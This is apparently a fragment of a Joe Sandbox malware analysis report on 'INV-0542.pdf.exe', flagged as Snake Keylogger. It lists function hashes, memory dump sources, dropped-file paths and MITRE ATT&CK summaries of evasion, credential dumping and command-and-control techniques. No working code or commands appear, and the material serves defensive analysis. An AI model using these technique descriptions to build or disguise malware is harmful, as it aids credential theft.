Instruction ID: 07d68cff18079a2c731daae364fa7c2914267fd03a7a1daa0af2740b1fe662ab
Opcode Fuzzy Hash: 5fb1b5cf7a8e385f97f309bae0e790f9d346e22cbbe14909e9f0be2f9cc6a81c
Instruction Fuzzy Hash: D7D1AF74E00218CFDB15DFA5C990B9DBBB2BF89300F6085A9D809AB369DB359D85CF11

Function 23EE5228 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3305302342.0000000023EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23ee0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31ed44b66836f3fe0c2224592b5846dfec6eb12afe822995f94207a59b48614f
Instruction ID: 406c8fe21ff2c74204bd1e7fcf02473d08586987b3939da0b6e96d9d80c0a57f
Opcode Fuzzy Hash: 31ed44b66836f3fe0c2224592b5846dfec6eb12afe822995f94207a59b48614f
Instruction Fuzzy Hash: A1D1BF74E00218CFDB15DFA5C990B9DBBB2BF89300F5085A9D809AB3A9DB359D85CF11

Function 23EE3238 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3305302342.0000000023EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23ee0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bacb1a94fc6b67b75986c29b8256e2d855174ebbf46fe7b933dd10e7aa03a227
Instruction ID: c828899fc9f489cf9f4f606df590bfcd2136237a7cb4e6f1efca0311c7395979
Opcode Fuzzy Hash: bacb1a94fc6b67b75986c29b8256e2d855174ebbf46fe7b933dd10e7aa03a227
Instruction Fuzzy Hash: 24D1C074E00218CFDB15DFA5C980B9DBBB2BF89300F6085A9D809AB369DB359D85CF11

Function 23EE4908 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3305302342.0000000023EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23ee0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3484678b3ceb347d1a417669dba325e7a12cfcd9b4c52c5e82e74cd89d0a89f7
Instruction ID: 7fee538db603a63e1cf2d426bdf846465399eeaa3174a72399c86afc5cdc757e
Opcode Fuzzy Hash: 3484678b3ceb347d1a417669dba325e7a12cfcd9b4c52c5e82e74cd89d0a89f7
Instruction Fuzzy Hash: BCD1CF74E00218CFDB15DFA9C990B9DBBB2BF89300F5085A9D809AB369DB359D85CF11

Function 23EE2918 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3305302342.0000000023EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23ee0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94837c1cf058c3f4cf01ba69c7a6d724f99d6cdd10240022e1d74a4fcbb0eed3
Instruction ID: 06231a53632e37a5078c9eafd83f6e2071f7b34d30c4a1bd5571da6c911bf075
Opcode Fuzzy Hash: 94837c1cf058c3f4cf01ba69c7a6d724f99d6cdd10240022e1d74a4fcbb0eed3
Instruction Fuzzy Hash: 56D1C074E00218CFDB15DFA5C980B9DBBB2BF89300F5085A9D909AB369DB359D85CF11

Function 23EE1710 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3305302342.0000000023EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23ee0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e95d9cc00f91f2b6d626429a5be9b6b5f663211bd598842d54f5183def79ada1
Instruction ID: 11e827c6b156710381bf318d8976059a47eab632e2eea2c7c59ffb103ce6232b
Opcode Fuzzy Hash: e95d9cc00f91f2b6d626429a5be9b6b5f663211bd598842d54f5183def79ada1
Instruction Fuzzy Hash: A2D1AE74E00218CFDB15DFA9C990B9DBBB2BF89300F5085A9D809AB369DB359D85CF11

Function 23EE1BA0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3305302342.0000000023EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23ee0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7b34036a9e847fb7c0b7d5b6632fb072c8c95c59b00cec92e5d68434b80893a
Instruction ID: 948d68c17c94875b376131ad3350c9153904418393dab104b3716c3433739e4a
Opcode Fuzzy Hash: d7b34036a9e847fb7c0b7d5b6632fb072c8c95c59b00cec92e5d68434b80893a
Instruction Fuzzy Hash: 11C1C574E00218CFDB14DFA5C954B9DBBB2BF89300F6085A9D809AB369DB359E85CF50

Function 00396920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;jq, xrefs: 00396936
\;jq, xrefs: 0039692C
\;jq, xrefs: 00396952
\;jq, xrefs: 0039695E

Memory Dump Source

Source File: 00000005.00000002.3285977148.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_390000_msiexec.jbxd

Similarity

API ID:
String ID: \;jq$\;jq$\;jq$\;jq
API String ID: 0-138087212
Opcode ID: 02b555011c5778c990a4630888e9f7cf563a9ccc2b1399dd5fd01fdc7d93d0a2
Instruction ID: 30a1146b7890b01c41c00b34044ce5d464f067d9432e74c3cab9cb1bd48fa36e
Opcode Fuzzy Hash: 02b555011c5778c990a4630888e9f7cf563a9ccc2b1399dd5fd01fdc7d93d0a2
Instruction Fuzzy Hash: BC018B317422158FCF269E2DC651A2677EBAF98760726416AE806CB3B4DF31EC419790

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report INV-0542.pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4fqk3cn0.gm0.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aq3pog4r.qmi.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hcdnq0dj.e4o.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ryu4jshc.nuk.psm1

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\INV-0542.pdf.exe

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\INV-0542.pdf.exe:Zone.Identifier

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Neonlysskilt.txt

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Ootid.Clo

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Suborbiculated.Amb

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Teet173.net

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\bibliotekskaldene.meg

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\nedlaeggelse.eva

Windows Analysis Report
INV-0542.pdf.exe

Function 0040351C Relevance: 84.5, APIs: 32, Strings: 16, Instructions: 464
stringfilecomCOMMON

Function 00405705 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Function 00405C4D Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Function 00406C5F Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Function 00403FC1 Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Function 00403C13 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Function 004030A2 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 181
memoryCOMMON

Function 0040657E Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 204
stringCOMMON

Function 00401794 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre